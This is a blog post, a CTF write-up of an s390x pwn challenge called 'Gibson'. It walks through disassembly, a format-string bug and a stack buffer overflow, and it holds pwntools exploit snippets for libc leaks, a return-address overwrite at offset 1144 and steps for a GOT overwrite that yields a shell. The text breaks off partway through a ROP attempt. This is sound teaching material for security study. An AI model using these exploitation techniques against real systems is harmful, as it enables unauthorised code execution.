<!doctype html><html lang=en class=no-js data-theme=dark><head><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1"><title>Gibson: format strings on s390x · eddie xiao</title><meta name=description content="vulnerability research · ctf · embedded network stacks"><meta name=generator content="Hugo 0.165.0"><link rel=canonical href=https://ex4722.github.io/posts/2022/gibson-format-strings-on-s390x/><link rel=alternate type=application/rss+xml href=https://ex4722.github.io/feed.xml title="eddie xiao"><link rel=preload href=https://ex4722.github.io/fonts/jbmono-variable.woff2 as=font type=font/woff2 crossorigin><link rel=stylesheet href=/css/main.55f9f4ccba10162775595233ceb1d4b6b96f2b719e755025522767a7ec21aef5.css integrity="sha256-Vfn0zLoQFid1WVIzzrHUtrlvK3GedVAlUidnp+whrvU="><script>(function(){var e=localStorage.getItem("theme");e||(e=window.matchMedia("(prefers-color-scheme: light)").matches?"light":"dark"),document.documentElement.setAttribute("data-theme",e),document.documentElement.classList.remove("no-js"),document.documentElement.classList.add("js")})()</script><link rel=pgp-key href=/pgp.txt></head><body><div class="buf page-post" style=--cat-color:#b58900><div class=progress-bar><div class=progress-bar-fill id=progress-fill style=background:#b58900></div></div><div class=buf-body><aside class=toc><div class=toc-label>CONTENTS</div><nav id=TableOfContents><ul><li><a href=#tldr>tl;dr</a></li><li><a href=#overview>Overview</a></li><li><a href=#setup>Setup</a></li><li><a href=#s390x>s390x</a></li><li><a href=#disassemly>Disassemly</a></li><li><a href=#bugs>BUGS</a></li></ul></nav></aside><main id=main class=content><div class=post-meta><span class=cat>PWN</span>
&#183; 2022-07-25
&#183; 14 MIN &#183; S390X / MANUAL SUBMISSION, NO REMOTE</div><h1 class=post-h1>Gibson: format strings on s390x</h1><div class=post-subtitle>A format-string leak and a BOF-driven ROP chain, made harder by an architecture nobody debugs for fun.</div><div class=tldr style=--cat-color:#b58900><span class=tldr-label>TL;DR</span>
<span class=tldr-text>Leak with a format string, then either ROP via the BOF or overwrite a GOT entry.</span></div><div class="prose post-body"><p><strong>"Can you really call it a "main"frame if I haven't used it before now?"</strong></p><p><strong>Author:crandyman</strong></p><p>No remote connection, Manual Submission Only</p><h2 id=tldr>tl;dr</h2><p>Leaks with Format String> ROP With BOF
OR
Leaks with Format String> GOT Overwrite</p><h2 id=overview>Overview</h2><p>This challenge was a hard pwn from US Cyber Open. The exploit was actually not that complicated but the fact that it used the s390 architecture made it challenging. The lack of decent documentation and tooling support made this challenge unfamiliar and getting the local environment to work was a pain.</p><h2 id=setup>Setup</h2><p>The challenge authors kindly provided the docker files that worked if you followed these specific steps</p><ul><li>Use an Ubuntu 22.04 x86_64 VM with Docker version 20.10.16 and Docker Compose version v2.5.0</li><li>Run <code>docker run --rm --privileged multiarch/qemu-user-static --reset -p yes</code> as specified in the tips.md</li><li><code>docker compose build</code></li><li><code>docker compose up</code></li></ul><p>The challenge had a nice setup with a competitor port that stimulated the challenge and a debug port that had gdb enabled</p><pre><code>- 9999: Fake Infrastructure 
- 8888: Debug port, gdb-server on 1234 
</code></pre><p>This gdb was for the s390x architecture so be sure to install gdb-multi-arch. GEF had a lot of issues so I ended up disabling most of its features.</p><h2 id=s390x>s390x</h2><p>The s390x is a 64 bit big endian architecture developed by IBM. Most of the instructions can be found here <a href=http://www.tachyonsoft.com/inst390m.htm>http://www.tachyonsoft.com/inst390m.htm</a>. Here's a list of the registers that look very similar to Arm registers</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-fallback data-lang=fallback><span class=line><span class=cl>s/390 &amp; z/Architecture Register usage
</span></span><span class=line><span class=cl>=====================================
</span></span><span class=line><span class=cl>r0       used by syscalls/assembly                  call-clobbered
</span></span><span class=line><span class=cl>r1	 used by syscalls/assembly                  call-clobbered
</span></span><span class=line><span class=cl>r2       argument 0 / return value 0                call-clobbered
</span></span><span class=line><span class=cl>r3       argument 1 / return value 1 (if long long) call-clobbered
</span></span><span class=line><span class=cl>r4       argument 2                                 call-clobbered
</span></span><span class=line><span class=cl>r5       argument 3                                 call-clobbered
</span></span><span class=line><span class=cl>r6	 argument 4				    saved
</span></span><span class=line><span class=cl>r7       pointer-to arguments 5 to ...              saved      
</span></span><span class=line><span class=cl>r8       this &amp; that                                saved
</span></span><span class=line><span class=cl>r9       this &amp; that                                saved
</span></span><span class=line><span class=cl>r10      static-chain ( if nested function )        saved
</span></span><span class=line><span class=cl>r11      frame-pointer ( if function used alloca )  saved
</span></span><span class=line><span class=cl>r12      got-pointer                                saved
</span></span><span class=line><span class=cl>r13      base-pointer                               saved
</span></span><span class=line><span class=cl>r14      return-address                             saved
</span></span><span class=line><span class=cl>r15      stack-pointer                              saved
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>f0       argument 0 / return value ( float/double ) call-clobbered
</span></span><span class=line><span class=cl>f2       argument 1                                 call-clobbered
</span></span><span class=line><span class=cl>f4       z/Architecture argument 2                  saved
</span></span><span class=line><span class=cl>f6       z/Architecture argument 3                  saved
</span></span><span class=line><span class=cl>The remaining floating points
</span></span><span class=line><span class=cl>f1,f3,f5 f7-f15 are call-clobbered.
</span></span></code></pre></div><h2 id=disassemly>Disassemly</h2><p>Running the program we are presented with a prompt to enter some data and then something is echoed back to us.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-fallback data-lang=fallback><span class=line><span class=cl>gibson_s390x &gt; nc localhost 9999
</span></span><span class=line><span class=cl>GIBSON S390X
</span></span><span class=line><span class=cl>Enter payroll data:
</span></span><span class=line><span class=cl>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
</span></span><span class=line><span class=cl>Processing data...
</span></span><span class=line><span class=cl>33333333333333333333333333333333333333333XRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
</span></span></code></pre></div><p>Googling Ghidra S390X resulted in this Chinese ctf blog post <a href=https://gange666.github.io/2019/09/09/Bytectf_2019_s390_Writeup>https://gange666.github.io/2019/09/09/Bytectf_2019_s390_Writeup</a>. Except the line with ghidra was not a setup guide, rather it was a note that none of the disassembling tools worked normally. Major disappointment but that means we only have objdump. Thankfully the program seems pretty simple</p><p>Running <code>s390x-linux-gnu-objdump -d bin/mainframe</code> can give us the full disassemly</p><p>Most of these instructions looked foreign but with the instructions lookup sheet and running in gdb we can get a general overview of the program execution.</p><ul><li>Main first calls setvbuf to fix buffering issues (Common CTF thing, not important)</li><li>Prints out banner</li><li>Reads in an input</li><li>Transforms out input</li><li>Printf's the transformed input</li><li>Sleep + Exit
Using this we can map most of the instructions in main to fit this execution flow</li></ul><div class=highlight><pre tabindex=0 class=chroma><code class=language-fallback data-lang=fallback><span class=line><span class=cl>0000000001000830 &lt;main&gt;:
</span></span><span class=line><span class=cl> 1000830:       eb bf f0 58 00 24       stmg    %r11,%r15,88(%r15)
</span></span><span class=line><span class=cl> 1000836:       e3 f0 fb 58 ff 71       lay     %r15,-1192(%r15) 
</span></span><span class=line><span class=cl> 100083c:       b9 04 00 bf             lgr     %r11,%r15
</span></span><span class=line><span class=cl> 1000840:       c4 18 00 00 0b d8       lgrl    %r1,1001ff0 &lt;stdin@GLIBC_2.2&gt;
</span></span><span class=line><span class=cl> 1000846:       e3 10 10 00 00 04       lg      %r1,0(%r1)
</span></span><span class=line><span class=cl> 100084c:       a7 59 00 00             lghi    %r5,0
</span></span><span class=line><span class=cl> 1000850:       a7 49 00 02             lghi    %r4,2
</span></span><span class=line><span class=cl> 1000854:       a7 39 00 00             lghi    %r3,0
</span></span><span class=line><span class=cl> 1000858:       b9 04 00 21             lgr     %r2,%r1
</span></span><span class=line><span class=cl> 100085c:       c0 e5 ff ff ff 1c       brasl   %r14,1000694 &lt;setvbuf@plt&gt;  ; setbuf(stdin, NULL); 
</span></span><span class=line><span class=cl> 1000862:       c4 18 00 00 0b cb       lgrl    %r1,1001ff8 &lt;stdout@GLIBC_2.2&gt;
</span></span><span class=line><span class=cl> 1000868:       e3 10 10 00 00 04       lg      %r1,0(%r1)
</span></span><span class=line><span class=cl> 100086e:       a7 59 00 00             lghi    %r5,0
</span></span><span class=line><span class=cl> 1000872:       a7 49 00 02             lghi    %r4,2
</span></span><span class=line><span class=cl> 1000876:       a7 39 00 00             lghi    %r3,0
</span></span><span class=line><span class=cl> 100087a:       b9 04 00 21             lgr     %r2,%r1
</span></span><span class=line><span class=cl> 100087e:       c0 e5 ff ff ff 0b       brasl   %r14,1000694 &lt;setvbuf@plt&gt;   ; setbuf(stdout, NULL); 
</span></span><span class=line><span class=cl> 1000884:       ec 1b 00 a0 00 d9       aghik   %r1,%r11,160
</span></span><span class=line><span class=cl> 100088a:       a7 49 04 00             lghi    %r4,1024
</span></span><span class=line><span class=cl> 100088e:       a7 39 00 00             lghi    %r3,0
</span></span><span class=line><span class=cl> 1000892:       b9 04 00 21             lgr     %r2,%r1 
</span></span><span class=line><span class=cl> 1000896:       c0 e5 ff ff ff 0f       brasl   %r14,10006b4 &lt;memset@plt&gt;              ; memset(buffer, 0, 1024) 
</span></span><span class=line><span class=cl> 100089c:       c0 20 00 00 00 d6       larl    %r2,1000a48 &lt;_IO_stdin_used+0x4&gt;
</span></span><span class=line><span class=cl> 10008a2:       c0 e5 ff ff fe d9       brasl   %r14,1000654 &lt;puts@plt&gt;               ; puts(&#34;GIBSON S390X&#34;)
</span></span><span class=line><span class=cl> 10008a8:       c0 20 00 00 00 d7       larl    %r2,1000a56 &lt;_IO_stdin_used+0x12&gt;
</span></span><span class=line><span class=cl> 10008ae:       c0 e5 ff ff fe d3       brasl   %r14,1000654 &lt;puts@plt&gt;                 ; puts(&#34;Enter payroll data:&#34;) 
</span></span><span class=line><span class=cl> 10008b4:       ec 1b 00 a0 00 d9       aghik   %r1,%r11,160
</span></span><span class=line><span class=cl> 10008ba:       a7 49 07 d0             lghi    %r4,2000
</span></span><span class=line><span class=cl> 10008be:       b9 04 00 31             lgr     %r3,%r1
</span></span><span class=line><span class=cl> 10008c2:       a7 29 00 00             lghi    %r2,0
</span></span><span class=line><span class=cl> 10008c6:       c0 e5 ff ff fe 97       brasl   %r14,10005f4 &lt;read@plt&gt;                ; read(0, buffer, 2000)
</span></span><span class=line><span class=cl> 10008cc:       c0 20 00 00 00 cf       larl    %r2,1000a6a &lt;_IO_stdin_used+0x26&gt;
</span></span><span class=line><span class=cl> 10008d2:       c0 e5 ff ff fe c1       brasl   %r14,1000654 &lt;puts@plt&gt;               ; puts(&#34;Processing data...&#34;)
</span></span><span class=line><span class=cl> 10008d8:       e5 48 b4 a0 00 00       mvghi   1184(%r11),0
</span></span><span class=line><span class=cl> 10008de:       a7 f4 00 13             j       1000904 &lt;main+0xd4&gt;
</span></span><span class=line><span class=cl> 10008e2:       e3 10 b4 a0 00 04       lg      %r1,1184(%r11)
</span></span><span class=line><span class=cl> 10008e8:       43 11 b0 a0             ic      %r1,160(%r1,%r11)
</span></span><span class=line><span class=cl> 10008ec:       c0 17 00 00 00 52       xilf    %r1,82
</span></span><span class=line><span class=cl> 10008f2:       18 21                   lr      %r2,%r1
</span></span><span class=line><span class=cl> 10008f4:       e3 10 b4 a0 00 04       lg      %r1,1184(%r11)
</span></span><span class=line><span class=cl> 10008fa:       42 21 b0 a0             stc     %r2,160(%r1,%r11)
</span></span><span class=line><span class=cl> 10008fe:       eb 01 b4 a0 00 7a       agsi    1184(%r11),1
</span></span><span class=line><span class=cl> 1000904:       e3 10 b4 a0 00 04       lg      %r1,1184(%r11)
</span></span><span class=line><span class=cl> 100090a:       c2 1e 00 00 03 ff       clgfi   %r1,1023
</span></span><span class=line><span class=cl> 1000910:       a7 c4 ff e9             jle     10008e2 &lt;main+0xb2&gt;
</span></span><span class=line><span class=cl> 1000914:       a7 29 00 00             lghi    %r2,0
</span></span><span class=line><span class=cl> 1000918:       c0 e5 ff ff fe 8e       brasl   %r14,1000634 &lt;sleep@plt&gt;                ; sleep(0);
</span></span><span class=line><span class=cl> 100091e:       ec 1b 00 a0 00 d9       aghik   %r1,%r11,160
</span></span><span class=line><span class=cl> 1000924:       b9 04 00 21             lgr     %r2,%r1
</span></span><span class=line><span class=cl> 1000928:       c0 e5 ff ff fe 76       brasl   %r14,1000614 &lt;printf@plt&gt;               ; printf(buffer)
</span></span><span class=line><span class=cl> 100092e:       a7 18 00 00             lhi     %r1,0
</span></span><span class=line><span class=cl> 1000932:       b9 14 00 11             lgfr    %r1,%r1
</span></span><span class=line><span class=cl> 1000936:       b9 04 00 21             lgr     %r2,%r1
</span></span><span class=line><span class=cl> 100093a:       eb bf b5 00 00 04       lmg     %r11,%r15,1280(%r11)
</span></span><span class=line><span class=cl> 1000940:       07 fe                   br      %r14
</span></span><span class=line><span class=cl> 1000942:       07 07                   nopr    %r7
</span></span><span class=line><span class=cl> 1000944:       07 07                   nopr    %r7
</span></span><span class=line><span class=cl> 1000946:       07 07                   nopr    %r7
</span></span></code></pre></div><h2 id=bugs>BUGS</h2><p>Usually, in x84 the stack pointer is decremented at the start of each function to make space for local variables. Noticed how 1192 is subtracted from r15 (the stack pointer) at the beginning of the main function</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-fallback data-lang=fallback><span class=line><span class=cl> 1000836:       e3 f0 fb 58 ff 71       lay     %r15,-1192(%r15)
</span></span></code></pre></div><p>This means that the stack buffer is probably around that size but the call to read seems to have 2000 as a parameter. Hence we have a buffer overflow!</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-fallback data-lang=fallback><span class=line><span class=cl> 10008ba:       a7 49 07 d0             lghi    %r4,2000
</span></span><span class=line><span class=cl> 10008be:       b9 04 00 31             lgr     %r3,%r1
</span></span><span class=line><span class=cl> 10008c2:       a7 29 00 00             lghi    %r2,0
</span></span><span class=line><span class=cl> 10008c6:       c0 e5 ff ff fe 97       brasl   %r14,10005f4 &lt;read@plt&gt;
</span></span></code></pre></div><p>Printf takes in a buffer instead of a format string. This means that our input transformed will be passed directly to printf. The transformation does not seem too fancy as theirs an one-to-one mapping. This means its either adding a value or XORing out input</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-fallback data-lang=fallback><span class=line><span class=cl> 1000924:       b9 04 00 21             lgr     %r2,%r1
</span></span><span class=line><span class=cl> 1000928:       c0 e5 ff ff fe 76       brasl   %r14,1000614 &lt;printf@plt&gt;               ; printf(buffer)
</span></span></code></pre></div><p>In this loop, all of these instructions seem like loads except one, xilf with XOR. It is xoring whatever is in r1 with 82 and then moving that into the buffer. We can confirm this by XORing our input with 82 and checking to see if we get the same input.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-fallback data-lang=fallback><span class=line><span class=cl> 10008e2:       e3 10 b4 a0 00 04       lg      %r1,1184(%r11)
</span></span><span class=line><span class=cl> 10008e8:       43 11 b0 a0             ic      %r1,160(%r1,%r11)
</span></span><span class=line><span class=cl> 10008ec:       c0 17 00 00 00 52       xilf    %r1,82
</span></span><span class=line><span class=cl> 10008f2:       18 21                   lr      %r2,%r1
</span></span><span class=line><span class=cl> 10008f4:       e3 10 b4 a0 00 04       lg      %r1,1184(%r11)
</span></span><span class=line><span class=cl> 10008fa:       42 21 b0 a0             stc     %r2,160(%r1,%r11)
</span></span><span class=line><span class=cl> 10008fe:       eb 01 b4 a0 00 7a       agsi    1184(%r11),1
</span></span><span class=line><span class=cl> 1000904:       e3 10 b4 a0 00 04       lg      %r1,1184(%r11)
</span></span><span class=line><span class=cl> 100090a:       c2 1e 00 00 03 ff       clgfi   %r1,1023
</span></span><span class=line><span class=cl> 1000910:       a7 c4 ff e9             jle     10008e2 &lt;main+0xb2&gt;
</span></span></code></pre></div><div class=highlight><pre tabindex=0 class=chroma><code class=language-fallback data-lang=fallback><span class=line><span class=cl>gibson_s390x&gt; nc localhost 9999   
</span></span><span class=line><span class=cl>GIBSON S390X
</span></span><span class=line><span class=cl>Enter payroll data:
</span></span><span class=line><span class=cl>aaaaaaaaaaaaaaaaaaaaaaaaaaa
</span></span><span class=line><span class=cl>Processing data...
</span></span><span class=line><span class=cl>333333333333333333333333333XRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR^C
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>gibson_s390x&gt; ipython3
</span></span><span class=line><span class=cl>Python 3.10.4 (main, Jun 29 2022, 12:14:53) [GCC 11.2.0]
</span></span><span class=line><span class=cl>Type &#39;copyright&#39;, &#39;credits&#39; or &#39;license&#39; for more information
</span></span><span class=line><span class=cl>IPython 7.31.1 -- An enhanced Interactive Python. Type &#39;?&#39; for help.
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>[nav] In [1]: from pwn import *
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>[ins] In [2]: xor(b&#34;a&#34;,82)
</span></span><span class=line><span class=cl>Out[3]: b&#39;3&#39;
</span></span></code></pre></div><h3>Attempt 1</h3>If this was x86 the exploit path would be relatively simple, use printf to leak values and then overwrite GOT. The main difference is that I couldn't find the magically one_gadget. This means that I'll have to resort to replacing something in the GOT with system. Printf is a great candidate as our input is directly passed so if we input /bin/sh we should get a shell.
The first issue is that after printf will exit so we need a way to loop the program. Luckily with our buffer overflow, we can overwrite the return address with main so it will loop forever.<p>Using GDB we can find the offset by spamming characters and checking which ones end up as the instructions pointer. After connecting to port 8888 it will hang until you attach to the gdb server on port 1234.</p><p>After inputting a cyclic pattern gdb crashes and we can find the offset as well as what register control we have.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-gdscript3 data-lang=gdscript3><span class=line><span class=cl><span class=n>Program</span> <span class=n>received</span> <span class=k>signal</span> <span class=n>SIGSEGV</span><span class=p>,</span> <span class=n>Segmentation</span> <span class=n>fault</span><span class=o>.</span>
</span></span><span class=line><span class=cl><span class=mh>0x6c61616c6d61616c</span> <span class=ow>in</span> <span class=err>??</span> <span class=p>()</span>
</span></span><span class=line><span class=cl><span class=n>gef</span><span class=o>&gt;</span>  <span class=n>x</span> <span class=o>$</span><span class=n>pc</span>
</span></span><span class=line><span class=cl><span class=mh>0x6c61616c6d61616c</span><span class=p>:</span>     <span class=n>Cannot</span> <span class=n>access</span> <span class=n>memory</span> <span class=n>at</span> <span class=n>address</span> <span class=mh>0x6c61616c6d61616c</span>
</span></span><span class=line><span class=cl><span class=n>gef</span><span class=o>&gt;</span>  <span class=n>info</span> <span class=n>registers</span> 
</span></span><span class=line><span class=cl><span class=n>pswm</span>           <span class=mh>0x180000000</span>         <span class=mh>0x180000000</span>
</span></span><span class=line><span class=cl><span class=n>pswa</span>           <span class=mh>0x6c61616c6d61616c</span>  <span class=mh>0x6c61616c6d61616c</span>
</span></span><span class=line><span class=cl><span class=n>r0</span>             <span class=mh>0xcccccccccccccccd</span>  <span class=mh>0xcccccccccccccccd</span>
</span></span><span class=line><span class=cl><span class=n>r1</span>             <span class=mh>0x0</span>                 <span class=mh>0x0</span>
</span></span><span class=line><span class=cl><span class=n>r2</span>             <span class=mh>0x0</span>                 <span class=mh>0x0</span>
</span></span><span class=line><span class=cl><span class=n>r3</span>             <span class=mh>0x7f095596b720</span>      <span class=mh>0x7f095596b720</span>
</span></span><span class=line><span class=cl><span class=n>r4</span>             <span class=mh>0x400</span>               <span class=mh>0x400</span>
</span></span><span class=line><span class=cl><span class=n>r5</span>             <span class=mh>0x0</span>                 <span class=mh>0x0</span>
</span></span><span class=line><span class=cl><span class=n>r6</span>             <span class=mh>0x10009b0</span>           <span class=mh>0x10009b0</span>
</span></span><span class=line><span class=cl><span class=n>r7</span>             <span class=mh>0x7f0956385c88</span>      <span class=mh>0x7f0956385c88</span>
</span></span><span class=line><span class=cl><span class=n>r8</span>             <span class=mh>0x1000830</span>           <span class=mh>0x1000830</span>
</span></span><span class=line><span class=cl><span class=n>r9</span>             <span class=mh>0x1000948</span>           <span class=mh>0x1000948</span>
</span></span><span class=line><span class=cl><span class=n>r10</span>            <span class=mh>0x1</span>                 <span class=mh>0x1</span>
</span></span><span class=line><span class=cl><span class=n>r11</span>            <span class=mh>0x6661616c6761616c</span>  <span class=mh>0x6661616c6761616c</span>
</span></span><span class=line><span class=cl><span class=n>r12</span>            <span class=mh>0x6861616c6961616c</span>  <span class=mh>0x6861616c6961616c</span>
</span></span><span class=line><span class=cl><span class=n>r13</span>            <span class=mh>0x6a61616c6b61616c</span>  <span class=mh>0x6a61616c6b61616c</span>
</span></span><span class=line><span class=cl><span class=n>r14</span>            <span class=mh>0x6c61616c6d61616c</span>  <span class=mh>0x6c61616c6d61616c</span>
</span></span><span class=line><span class=cl><span class=n>r15</span>            <span class=mh>0x6e61616c6f61616c</span>  <span class=mh>0x6e61616c6f61616c</span>
</span></span><span class=line><span class=cl><span class=o>------------------</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>ex</span><span class=err>@</span><span class=n>ex</span><span class=o>-</span><span class=n>Standard</span><span class=o>-</span><span class=n>PC</span><span class=o>-</span><span class=n>Q35</span><span class=o>-</span><span class=n>ICH9</span><span class=o>-</span><span class=mi>2009</span><span class=p>:</span><span class=o>~/</span><span class=n>ctf</span><span class=o>/</span><span class=n>gibson_s390x</span><span class=o>$</span> <span class=n>cyclic</span> <span class=o>-</span><span class=n>l</span> <span class=mh>0x6c61616c</span>
</span></span><span class=line><span class=cl><span class=mi>1144</span>
</span></span></code></pre></div><p>With this offset, we can create a payload that will leak values and then loop the program</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-python data-lang=python><span class=line><span class=cl><span class=n>bof_offset</span> <span class=o>=</span> <span class=mi>1144</span>
</span></span><span class=line><span class=cl><span class=n>payload</span> <span class=o>=</span> <span class=sa>b</span><span class=s1>&#39;&#39;</span>
</span></span><span class=line><span class=cl><span class=n>payload</span> <span class=o>+=</span> <span class=n>xor</span><span class=p>(</span><span class=s2>&#34;%p  &#34;</span><span class=o>*</span><span class=mi>10</span><span class=p>,</span> <span class=mi>82</span><span class=p>)</span> <span class=o>*</span> <span class=mi>3</span>
</span></span><span class=line><span class=cl><span class=n>payload</span> <span class=o>+=</span> <span class=sa>b</span><span class=s1>&#39;A&#39;</span><span class=o>*</span><span class=p>(</span><span class=n>bof_offset</span> <span class=o>-</span><span class=nb>len</span><span class=p>(</span><span class=n>payload</span><span class=p>))</span>
</span></span><span class=line><span class=cl><span class=n>payload</span> <span class=o>+=</span> <span class=n>p64</span><span class=p>(</span><span class=n>exe</span><span class=o>.</span><span class=n>symbols</span><span class=o>.</span><span class=n>main</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>p</span><span class=o>.</span><span class=n>send</span><span class=p>(</span><span class=n>payload</span><span class=p>)</span>
</span></span></code></pre></div><p>After the first time, this payload is sent the return pointer will remain overwritten so we can get unlimited attempts at printf.
My first exploit attempt took advantage of a partial GOT overwrite as printf and system were very close in this libc.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-fallback data-lang=fallback><span class=line><span class=cl>[ins] In [2]: hex(libc.symbols.printf - libc.symbols.system)
</span></span><span class=line><span class=cl>Out[2]: &#39;0xbec0&#39;
</span></span></code></pre></div><p>Doing a 32 bit overwrite was not possible as printing that many characters took a couple of minutes and there was a 1-minute timeout on the remote instance
However, we can do a 16 bit overwrite to just change the last 2 bits of the GOT entry for printf. This was a very bad idea as most of the time alsr base caused the difference to leak into the next byte. We would need to do some brute forcing to get a good libc address.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-fallback data-lang=fallback><span class=line><span class=cl>printf: 0x7fc9a087 5070
</span></span><span class=line><span class=cl>system: 0x7fc9a086 91b0
</span></span><span class=line><span class=cl>                 ^^
</span></span></code></pre></div><p>Small Hiccups Here</p><ul><li>Input is XORed with 82 so XOR all of the input</li><li>Printf will print a lot of extra characters, appending a NULL byte at the end of the printf will stop this</li></ul><div class=highlight><pre tabindex=0 class=chroma><code class=language-python data-lang=python><span class=line><span class=cl><span class=k>def</span> <span class=nf>sxor</span><span class=p>(</span><span class=n>payload</span><span class=p>):</span>
</span></span><span class=line><span class=cl>    <span class=n>p</span><span class=o>.</span><span class=n>send</span><span class=p>(</span><span class=n>xor</span><span class=p>(</span><span class=n>payload</span> <span class=o>+</span> <span class=sa>b</span><span class=s1>&#39;</span><span class=se>\x00</span><span class=s1>&#39;</span><span class=p>,</span><span class=mi>82</span><span class=p>))</span>
</span></span></code></pre></div><p>EXPLOIT STEPS:</p><ul><li>Overflow stack so return address is main</li><li>Printf("%p") to get libc leaks</li><li>Use printf padding to print bytes equal to libc.symbols.system & 0xffff</li><li>Use "%hn" to write to 16 bits of printf got address</li><li>Send /bin/sh xored</li></ul><p>Eventually I got it working locally but on the remote instance, it didn't. I could not figure out what was going on and then I found out that most people had an exploit that worked most of the time so I decided to rewrite my exploit. After solving it I realized that this approach WOULD work but I was leaking libc wrong.</p><p>Most of the time the libc base was wrong or it segfaulted upon connection but running this in a loop eventually worked. After a couple more submissions I found out that my exploit never worked. I thought it was just luck but after some time I found out that most people used an exploit that worked almost 100% of the time. At this point, I decided to rewrite this exploit for it to be more stable. After the competition, I found out that this idea would work but I was leaking values incorrectly. The stacks always shifting so the %p on my machine might not be the same on remote.</p><p><strong>Attempt 2</strong>
Relying on alsr was not a good exploit attempt. I didn't want to ROP as I was hoping to avoid learning the architecture but this was inevitable. After examining various functions it seems that many functions have this epilogue.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-fallback data-lang=fallback><span class=line><span class=cl>=&gt; 0x100093a &lt;main+266&gt;:        lmg     %r11,%r15,1280(%r11)
</span></span><span class=line><span class=cl>   0x1000940 &lt;main+272&gt;:        br      %r14
</span></span></code></pre></div><p>I had no idea what this does but gdb showed that it was just moving values from r15(the stack)+1280 into registers from r11-r15.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-fallback data-lang=fallback><span class=line><span class=cl>gef&gt;  x/4i $pc
</span></span><span class=line><span class=cl>=&gt; 0x100093a &lt;main+266&gt;:        lmg     %r11,%r15,1280(%r11)
</span></span><span class=line><span class=cl>   0x1000940 &lt;main+272&gt;:        br      %r14
